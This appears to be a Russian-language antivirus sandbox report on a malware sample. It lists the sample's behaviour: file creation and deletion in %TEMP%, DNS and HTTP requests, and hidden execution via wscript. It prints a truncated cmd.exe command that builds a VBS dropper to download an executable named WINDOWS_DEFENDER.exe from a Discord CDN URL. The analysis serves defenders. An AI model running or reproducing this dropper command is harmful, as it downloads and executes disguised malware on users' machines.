Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO B7m= "https://cdn.discordapp.com/attachments/781285406830231554/787612148259749898/WINDOWS_DEFENDER.exe">>C1c.VBS &@ECHO W1k = M5w("]N\]U7NaN")>>C1c.VBS &@ECHO Set A9g = Cr...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\c1c.vbs
Удаляет следующие файлы
- %TEMP%\c1c.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
UDP
- DNS ASK cd#.##scordapp.com
- DNS ASK oc##.#tartssl.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\C1c.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO B7m= "https://cdn.discordapp.com/attachments/781285406830231554/787612148259749898/WINDOWS_DEFENDER.exe">>C1c.VBS &@ECHO W1k = M5w("]N\]U7NaN")>>C1c.VBS &@ECHO Set A9g = Cr...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' 13
